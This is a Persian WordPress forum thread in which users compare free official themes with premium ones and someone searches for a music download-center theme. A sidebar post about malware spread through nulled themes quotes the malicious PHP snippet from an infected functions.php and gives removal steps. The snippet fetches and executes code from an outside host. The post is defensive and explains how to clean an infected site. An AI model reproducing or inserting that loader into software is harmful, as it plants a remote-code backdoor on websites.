• اطلاعیه ها

• Morteza

باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
TC98

قالب پریمیوم یا قالب های رسمی وردپرس

11 پست در این موضوع قرار دارد

سلام دوستان از اهل فن ها یه سوال داشتم

اقا قالب هایی که خود ورپرس به صورت رایگان در اختبار کاربرها میزاره قابل اطمینان و استاندارد (از لحاظ سئو، رسپانسیو و نظیر اینها) هست؟

داشتم قالب های پریمیوم رو نگاه می کردم. دیدم شاید بشه با یه قالب رایگان و چند تا افزونه صفحه ساز و ویجت و اینها بتونم سایت رو اونطوری که میخوام بکنم. ولی میخوام بدونم ایا ارزش داره یا بهتر این قالب پریمیوم تهیه کنم

1

به اشتراک گذاری این پست

لینک به پست
نقل قول

اقا قالب هایی که خود ورپرس به صورت رایگان در اختبار کاربرها میزاره قابل اطمینان و استاندارد (از لحاظ سئو، رسپانسیو و نظیر اینها) هست؟

تا حد خیلی زیادی بله ولی هیچ تضمینی درشون نیست.

نقل قول

داشتم قالب های پریمیوم رو نگاه می کردم. دیدم شاید بشه با یه قالب رایگان و چند تا افزونه صفحه ساز و ویجت و اینها بتونم سایت رو اونطوری که میخوام بکنم. ولی میخوام بدونم ایا ارزش داره یا بهتر این قالب پریمیوم تهیه کنم

اگر از خود سایت اصلی تم فارست تهیه کنید بله وگرنه از سایتهای داخلی که دار عرضه میکنن نگیرید.

4

به اشتراک گذاری این پست

لینک به پست
در در 12/27/2016 at 00:14، mohammad.983 گفته است :

سلام دوستان از اهل فن ها یه سوال داشتم

با توجه به این این قالب ها عمدتا رایگان هستم زیاد توقعی ازشون نداشته باشید

و برای قالبهای پریمیوم هم حتما باید از منبع قابل اعتماد تهیه نمائید

برای خرید هم از مارکت های بین المللی بعد از استفاده از فیلتر شکن بدلیل فیلتر بودن ایپی های ایرانی حتما باید با پی پال و ویزا کارت و مستر کارت و یا خدمات وبسایتهای واسطه استفاده نمائید

در در 12/27/2016 at 00:14، mohammad.983 گفته است :

ضمنا ابتدا هدف وبسایتتون رو تعییین بفرمائید و سپس نوع قالبی رو که میخواین بر حسب نیازهای مورد نظرتون جستجو بفرمائید

1

به اشتراک گذاری این پست

لینک به پست
در هم اکنون، modernhosting.ir گفته است :

ضمنا ابتدا هدف وبسایتتون رو تعییین بفرمائید و سپس نوع قالبی رو که میخواین بر حسب نیازهای مورد نظرتون جستجو بفرمائید

ممنون از توضیحاتتون. والا من که الان دو ماهه دنبال یه قالب سایت موزیک هستم. هرچی می گردم یه چیز بدربخور پیدا نمی کنم!

1

به اشتراک گذاری این پست

لینک به پست
در 7 دقیقه قبل، mohammad.983 گفته است :

ممنون از توضیحاتتون. والا من که الان دو ماهه دنبال یه قالب سایت موزیک هستم. هرچی می گردم یه چیز بدربخور پیدا نمی کنم!

دقیقا چه نوع قالبی رو میخواهید و حجم کار وبسایتتون و سبک کاریتون چجوری هست و چه تفاوتی با باقی وبسایتهای موسیقی خواهد داشت؟

1

به اشتراک گذاری این پست

لینک به پست
در هم اکنون، modernhosting.ir گفته است :

دقیقا چه نوع قالبی رو میخواهید و حجم کار وبسایتتون و سبک کاریتون چجوری هست و چه تفاوتی با باقی وبسایتهای موسیقی خواهد داشت؟

دنبال یه قالب ساده می گردم، سایت مون فقط مربوط به موسیقی بی کلام هست. واسه همین دنبال یه قالب جیمگول نمی گردم. یه قالب شیک و سبک، با زمینه دلخواه. ولی تا الان چیزی پیدا نکردم.

1

به اشتراک گذاری این پست

لینک به پست

حیف فروشگاهی هست. یکی هم بیاد واسه موزیک و کلا دانلود سنتر یه قالب حرفه ای طراحی کنه

1

به اشتراک گذاری این پست

لینک به پست
در 51 دقیقه قبل، mohammad.983 گفته است :

دنبال یه قالب ساده می گردم، سایت مون فقط مربوط به موسیقی بی کلام هست. واسه همین دنبال یه قالب جیمگول نمی گردم. یه قالب شیک و سبک، با زمینه دلخواه. ولی تا الان چیزی پیدا نکردم.

خوب اجازه بدین یه نگاهی بندازم برایتون چند تا خوب پیدا میکنم و براتون معرفی میکنم

در 28 دقیقه قبل، mohammad.983 گفته است :

حیف فروشگاهی هست. یکی هم بیاد واسه موزیک و کلا دانلود سنتر یه قالب حرفه ای طراحی کنه

بحث داونلود سنتر خودش داستانی مفصل داره فرق داره با یه سایت عادی باید پورتال چند بخشی و با امکانات مختلف براتون سفارشی راه اندازی بشن!!!!

0

به اشتراک گذاری این پست

لینک به پست
در 4 ساعت قبل، modernhosting.ir گفته است :

خوب اجازه بدین یه نگاهی بندازم برایتون چند تا خوب پیدا میکنم و براتون معرفی میکنم

دستت درد نکنه. واقعا لطف می کنی

0

به اشتراک گذاری این پست

لینک به پست
در 4 دقیقه قبل، mohammad.983 گفته است :

دستت درد نکنه. واقعا لطف می کنی

نتایجی که پیدا کردم خیلی زیادن براتون لینک ها رو میفرستم خودتون تک به تک باید بگردین ببینید کدومشون به نظرتون نیازهاتون رو برطرف میکنه بعد که پیدا کردین همین جا اسم و لینکش رو برای بنده بفرتسین تا بگردم قالب قابل داونلودش رو پیدا کنم

لینک ها:

لینک اول

لینک دوم

لینک سوم

لینک چهارم
این مراجع رو با جستجو در گوگل میتونید پیدا کنید و اگر تسلط خوبی به زبان انگلیسی داشته باشید و کمی زمان بگذارید به نتایج خوبی میرسید

موفق باشید

1

به اشتراک گذاری این پست

لینک به پست
در در 12/29/2016 at 01:32، مادرن هاستینگ دات آی آر گفته است :

نتایجی که پیدا کردم خیلی زیادن براتون لینک ها رو میفرستم خودتون تک به تک باید بگردین ببینید کدومشون به نظرتون نیازهاتون رو برطرف میکنه بعد که پیدا کردین همین جا اسم و لینکش رو برای بنده بفرتسین تا بگردم قالب قابل داونلودش رو پیدا کنم

لینک ها:

لینک اول

لینک دوم

لینک سوم

لینک چهارم
این مراجع رو با جستجو در گوگل میتونید پیدا کنید و اگر تسلط خوبی به زبان انگلیسی داشته باشید و کمی زمان بگذارید به نتایج خوبی میرسید

موفق باشید

ممنون از زحمتی که کشیدی. این ها رو بیشتر رو دیدم. 

اکثرا به درد سایت گروه های موزیک می خورند. من برای دانلود سنتر می خوام. تو ایرانی ها قالب های فامو رو دیدم بعضی هاش بد نبود. ولی کلا پشتیبانی ش وجود نداره!

0

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط logomaster
      سلام دوستان . من دوتا لینک انتهای این تیکت میزارم که مربوط به یک قالب هست ( دو صفحه از یک قالب)
      ساختار کلی این قالب بسیار خوبه از دید من و میخواستم از تم فارست خریداری کنم ! اما به دلیل اینکه فروش خوبی نداشته ، پشتیبانی خوبی نداره و تا بحال فقط یکبار آپدیت شده ، نمیخوام ریسک کنم.
      حالا از دوستان اگر کسی یک قالب مشابه این ( از نظر ساختار و قالب بندی محتوا ، کدهای کوتاه و.... ) میشناسه به من معرفی کنه . این قالب خیلی خیلی به ایده آلی که من از یک قالب در ذهن دارم نزدیکه.
      http://demo.cmssuperheroes.com/themeforest/inbound-marketing/form/
      http://demo.cmssuperheroes.com/themeforest/inbound-marketing/services-2-2/
    • توسط master89
      دوستان سلام
      یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.
      جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!
      شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.
      توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.
      صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.
      نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)
      آموزش حذف ویروس :
      اول سایتتون رو اینجا وارد کنید و چک کنید
      https://sitecheck.sucuri.net/  
      حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید
      و قطعه کد زیر رو ازش حذف کنید
      if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.
      (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)
      سپاس
    • توسط yaali
      بنام خدا
      :::لینک دانلود قالب فراسر:::
      دانلود قالب  
      خیلی وقت هست که به دنبال یک قالب وردپرسی ای بودم که جدا از ساده بودن، بتوانم با آن کد لایسنس و چیزایی از این دست بفروشم. علاوه بر اون کد فروخته شده بلافاصله به شماره موبایل مشتری هم پیامک بشه.
      قالبها و افزونه های زیادی ادعا داشتند که می توانند این کار را انجام دهند؛ اما در واقع هیچکدام کامل نبودند و پاسخی برای نیاز صاحبان فروشگاه نداشتند.
      بالاخره بر آن شدیم تا یه قالب ساده و در عین حال سریع و کارآمد برای این کار آماده کنیم. بعد از فراز و نشیب های بسیار، الان در خدمت شما هستیم با معرفی قالب فراسر.
      قالب فراسر یک قالب وردپرس هست که با اون میشه کارای زیادی رو انجام داد. یه نمونه ی معروف از اون فروش کارت شارژ هست. از طرف دیگه میشه با اون کد لایسنس هم فروخت. یعنی یه سایت فروش لایسنس آنتی ویروس داشت.
      با قالب فراسر می تونید هر نوع خدمتی که بر اساس کد و یا متن باشه انجام دهید. مثل فروش اپل آیدی و یا فروش یه جمله عاشقانه به طوری که هر جمله در یک سطر باشه و آپلود بشه و ...
      تصاویری از قالب فراسر رو می بینید:

این قالب توسط قلم سافت کدنویسی و آماده شده است و زحمت فارسی سازی اون رو بچه های همیاروردپرس کشیدن که به نشانه ی تشکر، متن پایین وبسایت حفظ شده است.
      هنگامی که بر روی هر کدام از دکمه های پرداخت کلیک کنید؛ با صفحه ی زیر منتقل می شوید:

این تصویر در واقع سبد خرید شماست. این صفحه به صورت خودکار به صفحه پرداخت منتقل می شود. انتقال خودکار اختیاری است که می توانید آن را از این صفحه حذف نمایید.
      در ادامه کاربر به صفحه زیر هدایت می شود. در این صفحه با وارد کردن تنها شماره موبایل خود می تواند خرید را انجام دهد. وارد کردن پست الکترونیکی اجباری نیست.

بعد از وارد کردن اطلاعات و پرداخت، بلافاصله کد مدنظر، به شماره شما پیامک می گردد. این قالب بر اساس پنل پیامکی sms.ir نوشته شده است. بزودی پنل های پیامکی  دیگر نیز به این قالب اضافه خواهند شد.

اگر شما هم مدتهاست که به دنبال چنین قالبی هستید می توانید هم اکنون با کلیک بر روی متن آن را دانلود کنید

• توسط نگار صادقی
      سلام وقت همگی بخیر.
      دوستان قالب 2017 پیشفرض وردپرس قالب خوبیه؟
      سئوش خوبه؟
      کدنویسی بهینه شده شده است؟
      ممنونم

• توسط shamea
      قالب سایتم درست بود یهوریخت بهم
      هیچ چیزم نصب نکردم هیچ کاریشم نکردم
      ادرسش اینه
      http://diacoshop.ir/
      اون قسمت های بالاش اسلایدبار بود هرکت میکرد الان ثابت شده حرکت نمیکنه
      مثه این بود:
      https://hamyarwp.com/preview/store/
      این دموشه